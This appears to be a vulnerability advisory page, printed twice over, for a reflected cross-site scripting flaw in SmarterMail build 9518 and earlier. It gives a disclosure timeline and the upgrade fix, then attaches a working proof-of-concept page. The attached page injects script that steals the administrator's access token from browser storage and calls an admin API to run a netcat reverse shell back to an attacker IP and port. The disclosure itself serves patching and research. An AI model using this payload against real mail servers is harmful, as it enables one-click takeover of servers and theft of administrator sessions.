7.2
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Description
SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized before being used to generate HTML output. This can be exploited by attackers to perform...
Basic Information
ID
PACKETSTORM:215790
Published
Feb 17, 2026 at 00:00
Affected Product
Affected Versions
----------------------------------------------------------------------------
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
[-] Software Link:
https://www.smartertools.com/smartermail/business-email-server
[-] Affected Versions:
Build 9518 and prior builds.
[-] Vulnerability Description:
User input passed through the "MailboxId" GET parameter to the MAPI
endpoints is not properly sanitized before being used to generate HTML
output. This can be exploited by attackers to perform Reflected Cross-Site
Scripting (XSS) attacks which, in turn, might lead to 1-click Remote
Command Execution (RCE) attacks.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-26930.html
[-] Solution:
Upgrade to build 9526 or later.
[-] Disclosure Timeline:
[26/01/2026] - Vendor notified
[26/01/2026] - Vendor response stating "we will get this over to the
developers for evaluation"
[30/01/2026] - Vendor released build 9526
[03/02/2026] - CVE identifier requested
[16/02/2026] - CVE identifier assigned
[16/02/2026] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.org) has assigned the
name CVE-2026-26930 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
--- packet storm attached poc: ---
<!--
----------------------------------------------------------------------------
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.smartertools.com/smartermail/business-email-server
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
-->
<script>
const VICTIM_URL = "http://smartermail";
const XSS = `<script>
const ATTACKER_IP = "192.168.1.23";
const ATTACKER_PORT = "4444";
fetch("` + VICTIM_URL + `/api/v1/settings/sysadmin/AddOrUpdateMount", {
method: "POST",
headers: {
"Content-Type": "application/json",
"Authorization": "Bearer " + Object.values(JSON.parse(localStorage.userTokens))[0].accessToken
},
body: JSON.stringify({
CommandMount: "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + ATTACKER_IP + " " + ATTACKER_PORT + " > /tmp/f",
MountPath: "RCE"
})
});
<\/script>`;
location.href = VICTIM_URL + "/mapi/nspi?MailboxId=" + encodeURIComponent(btoa(XSS));
</script>
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
[-] Software Link:
https://www.smartertools.com/smartermail/business-email-server
[-] Affected Versions:
Build 9518 and prior builds.
[-] Vulnerability Description:
User input passed through the "MailboxId" GET parameter to the MAPI
endpoints is not properly sanitized before being used to generate HTML
output. This can be exploited by attackers to perform Reflected Cross-Site
Scripting (XSS) attacks which, in turn, might lead to 1-click Remote
Command Execution (RCE) attacks.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-26930.html
[-] Solution:
Upgrade to build 9526 or later.
[-] Disclosure Timeline:
[26/01/2026] - Vendor notified
[26/01/2026] - Vendor response stating "we will get this over to the
developers for evaluation"
[30/01/2026] - Vendor released build 9526
[03/02/2026] - CVE identifier requested
[16/02/2026] - CVE identifier assigned
[16/02/2026] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.org) has assigned the
name CVE-2026-26930 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
--- packet storm attached poc: ---
<!--
----------------------------------------------------------------------------
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.smartertools.com/smartermail/business-email-server
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
-->
<script>
const VICTIM_URL = "http://smartermail";
const XSS = `<script>
const ATTACKER_IP = "192.168.1.23";
const ATTACKER_PORT = "4444";
fetch("` + VICTIM_URL + `/api/v1/settings/sysadmin/AddOrUpdateMount", {
method: "POST",
headers: {
"Content-Type": "application/json",
"Authorization": "Bearer " + Object.values(JSON.parse(localStorage.userTokens))[0].accessToken
},
body: JSON.stringify({
CommandMount: "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + ATTACKER_IP + " " + ATTACKER_PORT + " > /tmp/f",
MountPath: "RCE"
})
});
<\/script>`;
location.href = VICTIM_URL + "/mapi/nspi?MailboxId=" + encodeURIComponent(btoa(XSS));
</script>